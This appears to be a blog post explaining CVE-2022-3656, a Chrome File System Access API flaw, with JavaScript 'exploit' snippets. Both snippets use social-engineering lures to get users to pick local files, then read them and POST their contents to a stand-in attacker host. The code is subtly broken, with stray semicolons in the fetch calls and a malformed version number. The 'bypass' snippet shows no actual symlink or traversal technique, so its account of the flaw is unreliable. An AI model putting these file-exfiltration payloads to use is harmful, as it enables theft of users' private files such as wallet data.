Overview
In October 2022, a security flaw (CVE-2022-3656) was flagged and patched in Google Chrome. This vulnerability, if properly exploited, allowed a malicious website to bypass Chrome’s file system restrictions. Here, we’ll break down what happened, how it worked, and share exploit details—with code snippets—for educational purposes only.
What Was the Issue?
Google Chrome protects your files using the File System Access API. Basically, when a website wants to access your local files, Chrome should vet that request thoroughly—ensuring the site can’t snoop around or trick you into sharing something sensitive.
With CVE-2022-3656, Chrome failed to check file access requests strictly enough. A remote attacker could use a crafted HTML page to bypass Chrome’s security measures and potentially steal files you thought were safe.
> Severity: Medium
> Fixed in: Chrome 107..5304.62
> Official reference: Chromium Issue 1366182
Insufficient Validation:
Chrome did not strictly validate file paths and file types when a site requested file access via the File System API.
Crafted HTML Payload:
An attacker could make an HTML page that requests specific files (say, your passwords or crypto wallet data).
User Interaction:
If the user trusted the site and granted access (sometimes via social engineering), the malicious site could access more files than intended.
Step 1. Basic Exploit HTML
This snippet tries to access local files via a hidden HTML form and sneaky JavaScript.
<!DOCTYPE html>
<html>
<body>
<button id="steal">Steal My Files</button>
<script>
document.getElementById('steal').onclick = async function() {
try {
// Request a file handle
const [fileHandle] = await window.showOpenFilePicker({
// Attacker tricks user into picking a sensitive directory/file
multiple: false
});
const file = await fileHandle.getFile();
const text = await file.text();
// Attacker could send file contents to their server
fetch('https://attacker.example.com/steal';, {
method: 'POST',
body: JSON.stringify({data:text}),
headers: {'Content-Type': 'application/json'}
});
alert('Thanks for your file!');
} catch(e) {
alert('Failed: ' + e);
}
};
</script>
</body>
</html>
What’s happening?
The attacker’s site uses showOpenFilePicker() from the File System Access API.
- A user is tricked into selecting a file (maybe through social engineering, e.g., "Upload your wallet backup to claim your prize!").
Step 2. Bypassing Restrictions
Due to the insufficient validation in Chrome, attackers could sometimes piggy-back off symbolic links (symlinks) or use relative file paths to try to sneak access to files outside the designated safe folder.
// Trick: Leverage symlinks or path traversal
const fileHandle = await window.showDirectoryPicker();
for await (const [name, handle] of fileHandle.entries()) {
if (handle.kind === 'file') {
const file = await handle.getFile();
const contents = await file.text();
// Send stolen content to attacker
fetch('https://attacker.example.com/steal';, {
method: 'POST',
body: JSON.stringify({file: name, contents: contents}),
headers: {'Content-Type': 'application/json'}
});
}
}
How Was It Fixed?
The Chrome team improved validation for file access via the File System Access API. Chrome now more rigorously checks where files come from and doesn’t trust relative paths or symlinks that could be abused.
Patched in: Chrome 107..5304.62
- Fixed Commit: Chromium Commit
- Security Report Acknowledgements: Chrome Releases Blog
References
- Chromium Bug 1366182
- CVE-2022-3656 on NIST NVD
- Chrome Release Notes (Oct 2022)
Final Word
CVE-2022-3656 offers a clear example of why even "medium" browser bugs matter. A small validation oversight in Chrome’s file system features created a window of opportunity for web-based attacks, especially through social engineering. If you build for the web, double-check how your front-end code processes files. If you browse, keep your browser fresh and always be wary of sites that want files from you.
> Exclusive takeaway: File System Access can make websites slick and powerful, but every API for user files is also a risk. This vulnerability is a reminder to treat file prompts online as seriously as you would a stranger asking for your house keys.
Timeline
Published on: 11/01/2022 23:15:00 UTC
Last modified on: 11/10/2022 00:15:00 UTC